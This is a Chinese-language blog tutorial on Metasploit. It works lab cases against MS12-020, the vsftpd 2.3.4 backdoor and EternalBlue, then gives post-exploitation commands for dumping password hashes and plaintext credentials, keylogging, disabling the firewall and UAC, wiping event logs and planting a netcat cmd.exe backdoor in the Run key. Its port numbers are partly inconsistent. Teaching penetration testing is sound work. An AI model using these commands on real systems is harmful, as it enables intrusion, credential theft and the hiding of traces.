Metasploit Framework-安全漏洞检测工具使用

news2025/1/21 4:51:31

一款开源的安全漏洞检测工具,简称MSF。可以收集信息、探测系统漏洞、执行漏洞利用测试等,为渗透测试、攻击编码和漏洞研究提供了一个可靠平台。

集成数千个漏洞利用、辅助测试模块,并保持持续更新。

由著名黑客、安全专家H.D. Moore主导开发

SecTools.Org Top Network Security Tools 排行榜排名第二位

官方网站: Metasploit | Penetration Testing Software, Pen Testing Security | Metasploit 。

在kali中,通过msfconsole进入控制台。

一、MSF漏洞框架常用模块

1)模块

指的是MSF框架中所使用的一段软件代码组件,默认有2000多个漏洞利用模块、1000多个辅助模块,以及好几百个后渗透模块。

2)Auxiliary 辅助

只负责执行扫描、嗅探、指纹识别、爆破等相关功能以辅助攻击,不直接在测试机和目标主机之间建立访问。

3)Exploit 漏洞利用

利用目标系统的安全漏洞发起实际的渗透攻击行为,包括用于破坏系统安全的攻击代码,每个漏洞都有相应的攻击代码。

4)Post 后渗透

在取得目标的远程控制权(“得手”)以后,可以进一步实施的攻击动作,如部署后门木马、获取敏感信息、实施跳板攻击等

5)Payloads 载荷

期望目标系统在被攻破以后执行的代码,方便攻击者实施控制;默认采用reverse_tcp反弹式载荷 ,表示从目标主机连接攻击者主机,提供命令行通道;另有bind shell载荷,则会在目标主机监听某个端口,攻击者连接此端口即获取控制权。

6)Evasion 免杀

在渗透测试中实现免杀,以防止被杀毒软件、防火墙、IDS及类似的安全软件检测出来

7)Encoders 编码器

包含各种编码工具,可以对payload进行编码加密,以便绕过入侵检测和过滤系统。

8)NOPS 空指令

不做任何操作,占位,可生成过防火墙的各种脚本文件。

二、MSF常见的使用及工作区配置

第一步:初始化数据库

[root] msfdb init //初始化数据库

[root] systemctl enable postgresql //开机自启动数据库

[root] systemctl status postgresql //查看数据库状态

    [root] msfconsole   //进入msf控制台   
            
        - 2099 exploits   //利用脚本(攻击脚本)
        - 1129 auxiliary   //辅助脚本(扫描脚本-信息收集)
        - 357 post         //后渗透
        - 592 payloads     //载荷

第二步:创建/删除/切换工作区/检索信息

1)管理工作区

msf6 > workspace //查看默认工作区

msf6 > workspace -a xiaolin   //创建工作区xiaolin

msf6 > workspace default      //切换到default工作区

msf6 > workspace -d xiaolin   //删除工作区xiaolin

2)扫描数据

msf6 > db_nmap -A -v 192.168.100.101 //扫描目标

3)查看扫描结果:

msf6 > workspace -v       //显示工作区详细信息

msf6 > hosts                   //查看扫描的主机

msf6 > services -p 80     //过滤端口

msf6 > services -S http  //过滤应用程序

msf6 > services              //查看所有服务

msf6 > notes                  //查看记录

举例:

msf6 > workspace -v

Workspaces
==========
当前      名字     主机      服务                          记录
current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      23        0      0      0      28
         
msf6 > services -p 80
Services
========
主机             端口   协议   名字   状态    消息
host            port  proto  name  state  info
----            ----  -----  ----  -----  ----
192.168.10.143  80    tcp    http  open   Apache httpd 2.2.8 (Ubuntu) DAV/2
msf6 > services -S http   
Services
========

host            port  proto  name  state  info
----            ----  -----  ----  -----  ----
192.168.10.143  80    tcp    http  open   Apache httpd 2.2.8 (Ubuntu) DAV/2
192.168.10.143  8180  tcp    http  open   Apache Tomcat/Coyote JSP engine 1.1

第三、msfconsole基础命令

? //获取帮助

exit    //退出MSF控制台

show    //查看模块或相关信息

search    //搜索模块

use      //使用模块

options     //列出当前模块的选项

set      //设置模块选项

run     //运行当前模块

back   //返回

msfconsole 常见操作

show exploits     //列出所有漏洞利用脚本

show auxiliary      //列出所有的辅助脚本

search http           //搜索和http 关键词相关的脚本

search smb        //搜索和smb 关键词相关的脚本

search EternalBlue //搜索与“永恒之蓝”有关的模块

search EternalBlue type:exploit //过滤出其中的攻击模块

use 0                        //使用编号为0的脚本

options                    //查看当前模块可用的选项

set rhosts 192.168.100.100   //设置远程主机地址

run                                //运行脚本

三、漏洞的利用案例

案例一:MS12-020 远程桌面漏洞-蓝屏

环境准备: kali一台(攻击)   winserver2008(攻击对象)

kali进入到 MSF框架模式: msfconsole

1)查找漏洞

msf6 > search ms12-020

msf6 > search  ms12-020

Matching Modules
================

   #  Name                                              Disclosure Date  Rank    Check  Description
   -  ----                                              ---------------  ----    -----  -----------
   0  auxiliary/dos/windows/rdp/ms12_020_maxchannelids  2012-03-16       normal  No     MS12-020 Microsoft Remote Desktop Use-After-Free DoS
   1  auxiliary/scanner/rdp/ms12_020_check                               normal  Yes    MS12-020 Microsoft Remote Desktop Checker

备注:两个辅助脚本,但是这两个脚本作用不一样
一个是ID为0   有一个关键词 DOS ,这个是发起攻击的脚本
一个是ID为1   有一个关键词 scanner  ,这个是扫描的脚本

2) 使用漏洞模块

msf6 > use 1

3) 设置攻击目标主机

msf6 auxiliary(scanner/rdp/ms12_020_check) > set rhosts     win2008的IP地址

4)执行攻击

msf6 auxiliary(scanner/rdp/ms12_020_check) > run

5) 检查winserver2008是否蓝屏

 案例二:vsftpd 2.3.4 后门漏洞利用CVE-2011-2523

环境准备: kali一台(攻击)   靶机msfadmin-主机(攻击对象)

kali进入到 MSF框架模式: msfconsole

1)查找漏洞

msf6 > search  vsftpd

2) 使用漏洞模块

msf6 > use 0

3) 设置攻击目标主机

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts    靶机的IP地址

4)执行攻击

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run

5)空白地方输入linux命令看是否可以

    pwd    ls    ifconfig  等等命令,如果可以,证明攻击成功

案例三:MS17-010永恒之蓝漏洞利用

环境准备: kali一台(攻击)    winserver2008(攻击对象)

kali进入到 MSF框架模式: msfconsole

1)查找漏洞

msf6 > search   ms17-010

2) 使用漏洞模块

msf6 > use 0

3) 设置攻击目标主机

msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts    靶机的IP地址

4)执行攻击

msf6 auxiliary(scanner/smb/smb_ms17_010) > run

攻击成功命令行变成:

meterpreter >

1、获取windows 服务器的密文密码

meterpreter > hashdump 

Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b

2、通过kiwi模块获取明文密码

meterpreter >  load kiwi    //加载kiwi

meterpreter > creds_all   //检测所有凭证,该命令可以列举系统中的明文密码

3、屏幕截图和屏幕录制

meterpreter > screenshot //屏幕截图

meterpreter > screenshare //屏幕共享,按快捷键Ctrl + C停止

4、meterpreter环境中,操作远程资源

meterpreter > pwd //查看远程目录位置

meterpreter > lpwd //查看在kali本机的目录

meterpreter > shell //进入目标主机的命令行

5、进程迁移

meterpreter >   ps   //查看进程列表

meterpreter > ps -S explorer     //查找explorer进程(用户权限大、不易被结束)
Filtering on 'explorer'

Process List
============

 PID   PPID  Name          Arch  Session  User                           Path
 ---   ----  ----          ----  -------  ----                           ----
2424 2562  explorer.exe  x64   1        WIN-53H85RJ4I2T\Administrator  C:\Windows\Explorer.EXE               

meterpreter > migrate 2424   //进程迁移,将 SYSTEM 权限 迁移为 Administrator

meterpreter > getuid            //确认迁移后的用户识别码

备注:进程迁移,只能同级别迁移或者高权限用户往低权限迁移,低权限无法往高权限迁

6、执行键盘操作记录

利用后渗透脚本开启键盘记录

meterpreter > run     post/windows/capture/keylog_recorder   //开启键盘记录后渗透脚本

在 winserver2008 打开记事本,输入任意内容

在 kali 检查是否成功记录

打开新的终端,执行命令检查文件

[root]# cat      /root/.msf4/loot/2023042774349_default_192.168.100.100··········· 

7、 防火墙配置

meterpreter > shell

C:\Windows\system32> chcp 65001 //解决中文乱码

1)关闭防火墙

C:\Windows\system32> netsh  advfirewall  set  allprofiles  state  off 

2) 开启防火墙

C:\Windows\system32>netsh  advfirewall  set  allprofiles  state  on

3)添加防火墙入站规则,放行444端口

C:\Windows\system32> netsh  advfirewall  firewall   add     rule   name=xiaolin   dir=in   action=allow   protocol=tcp localport=1234
                            高级防火墙      防火墙     添加     规则   名字      入站     动作    允许     协议         本地端口

netsh advfirewall firewall add rule name=xiaolin dir=in action=allow protocol=tcp localport=1234

8、 关闭UAC

UAC(User Account Control)用户帐户控制,windows操作系统中一种安全控制机制,可以防止未经授权应用程序的自动安装,阻止恶意程序

winserver2008 检查 UAC 状态

运行中输入 msconfig → 工具 → “更改UAC设置” → 启动

修改注册表项,关闭用户账户控制

c:\windows\system>reg ADD  HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System     /v   EnableLUA    /t     REG_DWORD   /d    0    /f

ADD 添加一个注册表项 -v 创建键值
-t 键值类型 -d 键值的值 1开/0关 -f 覆盖现有注册表项

9、在meterpreter 下清除日志

meterpreter > clearev //擦除windows 事件查看器

[*] Wiping 2345 records from Application... //擦除应用日志

[*] Wiping 3564 records from System... //擦除系统日志

[*] Wiping 4521 records from Security... //擦除安全日志

10、持久性后门

NC:(netcat)被称为网络工具中的瑞士军刀,体积小巧,但功能强大。可以在两台设备上面相互交互,即侦听模式/传输模式

案例目标:防止目标主机修补了漏洞后,无法通过系统漏洞侵入目标主机。植入后门并设置开机自启,黑客可以通过后门444口远程控制目标主机

1、上传后面程序nc.exe 到win-2008

meterpreter > upload /usr/share/windows-binaries/nc.exe   c:/windows/system32

查看上传结果及权限

meterpreter > cd c:/windows/system32

meterpreter > ls nc.exe

2、配置注册表开机自启

在 meterpreter > 执行命令,远程配置win-2008注册表,实现nc.exe 能够开机自启

第一:添加键值nc 

**meterpreter > reg setval -k HKLM\software\microsoft\windows\currentversion\run -v nc -d "C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe"

备注:用注册表配置win-2008系统,nc.exe程序开机自启动

第二:查询有没有nc这个键值,确认是否添加成功

meterpreter > reg enumkey -k HKLM\software\microsoft\windows\currentversion\run

Values (3):

nc       //新增的注册表

第三:查询 NC键值的详细数值内容

meterpreter > reg queryval -k HKLM\software\microsoft\windows\currentversion\run -v nc

Key: HKLM\software\microsoft\windows\currentversion\Run

Name: nc

Data: C:\windows\system32\nc.exe -Ldp 1234 -e cmd.exe

3、重启win-2008,看nc是否开机自启动

验证:如果1234端口开启代表nc启动成功

打开命令提示符:

C:\Users\Administrator> netstat -an | findstr "1234"  //或仅执行 netstat -an,查找1234口

4、后门接入

在 kali 连接 winserver2008,在kali 中打开一个新的终端

[root] nc  2008的IP地址  444

C:\Windows\system32> //成功进入到目标主机命令行

5、清楚痕迹

验证:在事件查看器里面看到的是administrator 的登录信息,可以使用cmd命令清空日志

C:\Windows\system32> wevtutil el //列出日志名称

C:\Windows\system32> wevtutil cl application //清除应用程序日志

C:\Windows\system32> wevtutil cl security //清除安全日志

C:\Windows\system32>  wevtutil cl system  //清除系统日志

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/469060.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Hadoop学习笔记(二)环境配置与服务器克隆

VMware与Centos7的安装 这部分很简单,只需要按照常规步骤一步一步安装即可。最后出现如下画面便完成了。 如果出现了一打开 “开启虚拟机” 就蓝屏的情况。可以试试将VMware更新到16的版本以上。 对虚拟机进行一系列的设置 设置VMware的IP地址 接下来点击 “NAT设…

计算任意时间内课时出现次数以及冲突情况判断

背景 整体由四部分组成,报名时间、报名周期、上课时间、上课周期 通过选择报名时间、报名周期、以及上课时间,去计算在培训周期内总的培训课时,并当上课时间冲突时,给出提示。 需求: 报名时间(日期时分&…

分享10个非常好用的绘图工具

无论你是一个专业的插画师,还是一个有创造力的人,想要随时记录生活的灵感,现在你只需要拿起平板电脑或打开电脑浏览器来描述你脑海中的图片。在本文中,我们选择了10个强大、方便、易于使用的在线绘图软件,其中一个必须…

人工智能之配置环境教程一:安装VsCode和Anaconda

人工智能之配置环境教程一:安装VsCode和Anaconda 作者介绍一. 安装VScode编辑器二. 安装Anaconda 作者介绍 孟莉苹,女,西安工程大学电子信息学院,2021级硕士研究生,张宏伟人工智能课题组。 研究方向&#…

语音特征工程—时域分析

当下主流语音前端算法在特征工程方面,从vad,降噪、降混响到盲源分离,无论是传统做法还是NN做法,大多基于频域。但近年在语音分离领域也看到了利用时域的做法,也取得了不错的效果。 本文从特征工程的角度,对…

jQuery购物车案例模块

<div class"car-header"><div class"w"><div class"car-logo"><img src"img/logo.png" alt""> <b>购物车</b></div></div></div></div><div class"c-…

研究了一个多月ChatGPT我发现了这些!!AI时来了?

好久都没有更新过博客了&#xff0c;大一下是真的很忙碌&#xff0c;属实是真的要崩溃了&#xff0c;但是博主还是坚强的活了下来&#xff0c;好了&#xff0c;进入正题&#xff0c;博主使用了一段时间的chatGPT发现真的可能AI时代将要来临&#xff0c;原本以为gpt能做网页已经…

二十三种设计模式第一篇-设计模式的原则和分类

怎么说&#xff0c;其实我挺讨厌设计模式的&#xff0c;但是不得不说&#xff0c;这东西解决问题确实有一手&#xff0c;并且设计模式确实规范了我们在开发中的代码&#xff0c;并且我们可以使用这二十三种设计模式解决我们碰到的业务问题&#xff0c;并且我们学的框架里边多多…

利用Python操作Mysql数据库

我们在进行Python编程的时候&#xff0c;时常要将一些数据保存起来&#xff0c;其中最方便的莫过于保存在文本文件了。但是如果保存的文件太大&#xff0c;用文本文件就不太现实了&#xff0c;毕竟打开都是个问题&#xff0c;这个时候我们需要用到数据库。提到数据库&#xff0…

怎样从零开始编译一个魔兽世界开源服务端Windows

怎样从零开始编译一个魔兽世界开源服务端Windows 第二章&#xff1a;编译和安装 我是艾西&#xff0c;上期我们讲述到编译一个魔兽世界开源服务端环境准备&#xff0c;那么今天跟大家聊聊怎么编译和安装我们直接进入正题&#xff08;上一章没有看到的小伙伴可以点我主页查看&…

haproxy负载均衡+keepalived高可用

LVS和haproxy、nginx做负载均衡时的区别 调度算法 LVS:轮询(rr)、加权轮询(wrr)、最少连接(lc)、加权最少连接(wlc)、源地址哈希值(sh)、目的地址哈希&#xff08;dh&#xff09; haproxy:轮询&#xff08;roundrobin)、加权轮询&#xff08;static-rr)、最少连接&#xff08…

2023有潜力的新药都有哪些?新药筛选方法总结

2023有潜力的新药都有哪些&#xff1f;这是一道蕴含无限可能性和未知挑战的问题。新药研发是制药公司不断追求的目标&#xff0c;每一次成功都可以带来巨额利润&#xff0c;改善患者生命质量&#xff0c;成就公司声誉。但与此同时&#xff0c;新药研发风险也是极大的&#xff0…

电梯导航栏的实现

点击跳到指定位置类似于电梯导航 .w {width: 1200px;margin: 0 auto; } .fixedtool {position: fixed;top: 100px;left: 50%;margin-left: -676px;width: 66px;background-color: #fff;display: none; }.fixedtool li {height: 32px;line-height: 32px;text-align: center;fo…

基于dsp+fpga的半导体运动台高速数据采集FPGA endac设计(三)

EnDat 双向串行通信协议的实现 数据&#xff08;测量值或参数&#xff09;可以在位置编码器和 EnDat 协议内核之间进行双向传输&#xff0c; EnDat 协议内核的收发单元支持 RS-485 差分信号传输&#xff0c;数据传输与传感伺服控制系统 生成的时钟脉冲同步。传输的数据…

如何将Postman API测试转换为JMeter以进行扩展

许多测试工程师使用Postman进行API测试自动化。他们发现端点&#xff0c;发出请求&#xff0c;创建测试数据&#xff0c;运行回归测试&#xff0c;使用Newman等实现API测试的持续集成。但是&#xff0c;Postman有一定的测试限制。希望获得更多负载测试能力的开发人员&#xff0…

系统集成项目管理工程师 笔记(第10章:项目质量管理)

文章目录 10.1.2 质量管理及其 发展史 35610.1.3 项目质量管理 35810.2.2 规划质量管理的输入 35910.2.3 规划质量管理的工具与技术 3601、成本效益分析法2、质量成本法&#xff08;一致性成本【预防、评价】 和 非一致性成本【内部、外部】&#xff09;3、七种基本质量工具&am…

数字设计小思 - 谈谈时钟:数字系统的心脏

前言 本系列整理数字系统设计的相关知识体系架构&#xff0c;为了方便后续自己查阅与求职准备。时钟作为数字系统中的“心脏”&#xff0c;其设计的质量好坏直接关乎整个系统的稳定性&#xff0c;本文主要介绍了数字设计中的常见的时钟产生电路和时钟类型&#xff0c;并进行相…

音视频八股文(7)-- 音频aac adts

AAC介绍 AAC&#xff08;Advanced Audio Coding&#xff09;是一种现代的音频编码技术&#xff0c;用于数字音频的传输和存储领域。AAC是MPEG-2和MPEG-4标准中的一部分&#xff0c;可提供更高质量的音频数据&#xff0c;并且相比于MP3等旧有音频格式&#xff0c;AAC需要更少的…

【经典题】二叉搜索树与双向链表

二叉搜索树与双向链表链接 解题思路 思路1 &#xff1a; 中序遍历&#xff0c;将节点放进vector中&#xff0c;再改链接关系&#xff0c;这很容易想出并解决&#xff0c;但这样明显不符合题意。 思路2&#xff1a; 这道题目要求将一个二叉搜索树转换成一个排序的双向链表&a…

php连接sqlserver

1.使用工具 Wampserver--3.3 sqlserver2023 php7.4.33 2.连接流程 1.下载Microsoft Drivers for PHP for SQL Server 下载地址&#xff1a;下载 Microsoft Drivers for PHP for SQL Server - PHP drivers for SQL Server | Microsoft Learn 2.下载Microsoft ODBC Driver …